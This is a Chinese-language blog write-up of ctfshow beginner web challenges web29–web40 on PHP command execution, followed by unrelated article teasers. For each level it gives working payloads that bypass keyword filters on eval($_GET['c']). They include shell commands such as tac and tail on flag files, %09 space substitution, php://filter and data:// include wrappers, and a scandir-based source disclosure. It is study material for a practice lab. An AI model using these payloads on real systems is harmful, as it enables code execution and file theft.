ctfshow(web入门-命令执行)-1

2024-09-01 20:20
文章标签 入门 命令 web 执行 ctfshow

本文主要是介绍ctfshow(web入门-命令执行)-1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.web29

只有当c参数的值不包含“flag”(区分大小写),才会执行这段代码

  $c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}

只要payload中没有flag即可

先尝试cat (右键源代码)  tail,tac皆可

system("tail fla*");

tac 逆序读 

tail 默认读后10行 

使用文件显示函数

cp函数 等等。。

2.web30

  $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    不能出现 flag,system,php

 echo`cat fl*g.p*hp`; 代替 system  右键源代码查看

 highlight_file(base64_decode("ZmxhZy5waHA="));

3.web31

绕过

"flag"、"system"、"php"、"cat"、"sort"、"shell"、点号(".")、空格(" ")和单引号("'")

highlight_file(base64_decode("ZmxhZy5waHA="));

echo`tac%09fl*`; %09代替空格

第二种

使用 eval.让 1逃逸

 

4.web32

/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(

比上一题多了 echo ( ; 不能使用命令注入了,尝试其他方法。

c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

 5.web33

比上一题多了一个双引号

payload

c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=rerquirexx

6.web34

和上一题一样。

7.web35

payload同上

c=include$_GET[1]%0a?>&1=php://filter/convert.base64-encode/resource=flag.php

 

8.web36 

比上一关多了对数字的限制

 9.web37

有include先尝试一下

然后用data执行代码

 

10.web38

过滤了等于号

可以将 <?php system('ls')> >> <?= system("ls")>

c=data://text/plain/,<?=system('tac fl*.*')?>

 11.web39

payload 同上

c=data://text/plain/,<?=system('tac fl*.*')?>

12.web40 

官方解法

show_source(next(array_reverse(scandir(pos(localeconv())))));


小白一枚,如有不足请多多指教!!!

这篇关于ctfshow(web入门-命令执行)-1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1127951

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

30常用 Maven 命令

Maven 是一个强大的项目管理和构建工具,它广泛用于 Java 项目的依赖管理、构建流程和插件集成。Maven 的命令行工具提供了大量的命令来帮助开发人员管理项目的生命周期、依赖和插件。以下是 常用 Maven 命令的使用场景及其详细解释。 1. mvn clean 使用场景:清理项目的生成目录,通常用于删除项目中自动生成的文件(如 target/ 目录)。共性规律:清理操作

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

数论入门整理(updating)

一、gcd lcm 基础中的基础,一般用来处理计算第一步什么的,分数化简之类。 LL gcd(LL a, LL b) { return b ? gcd(b, a % b) : a; } <pre name="code" class="cpp">LL lcm(LL a, LL b){LL c = gcd(a, b);return a / c * b;} 例题:

Java 创建图形用户界面(GUI)入门指南(Swing库 JFrame 类)概述

概述 基本概念 Java Swing 的架构 Java Swing 是一个为 Java 设计的 GUI 工具包,是 JAVA 基础类的一部分,基于 Java AWT 构建,提供了一系列轻量级、可定制的图形用户界面(GUI)组件。 与 AWT 相比,Swing 提供了许多比 AWT 更好的屏幕显示元素,更加灵活和可定制,具有更好的跨平台性能。 组件和容器 Java Swing 提供了许多

【IPV6从入门到起飞】5-1 IPV6+Home Assistant(搭建基本环境)

【IPV6从入门到起飞】5-1 IPV6+Home Assistant #搭建基本环境 1 背景2 docker下载 hass3 创建容器4 浏览器访问 hass5 手机APP远程访问hass6 更多玩法 1 背景 既然电脑可以IPV6入站,手机流量可以访问IPV6网络的服务,为什么不在电脑搭建Home Assistant(hass),来控制你的设备呢?@智能家居 @万物互联

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

poj 2104 and hdu 2665 划分树模板入门题

题意: 给一个数组n(1e5)个数,给一个范围(fr, to, k),求这个范围中第k大的数。 解析: 划分树入门。 bing神的模板。 坑爹的地方是把-l 看成了-1........ 一直re。 代码: poj 2104: #include <iostream>#include <cstdio>#include <cstdlib>#include <al

MySQL-CRUD入门1

文章目录 认识配置文件client节点mysql节点mysqld节点 数据的添加(Create)添加一行数据添加多行数据两种添加数据的效率对比 数据的查询(Retrieve)全列查询指定列查询查询中带有表达式关于字面量关于as重命名 临时表引入distinct去重order by 排序关于NULL 认识配置文件 在我们的MySQL服务安装好了之后, 会有一个配置文件, 也就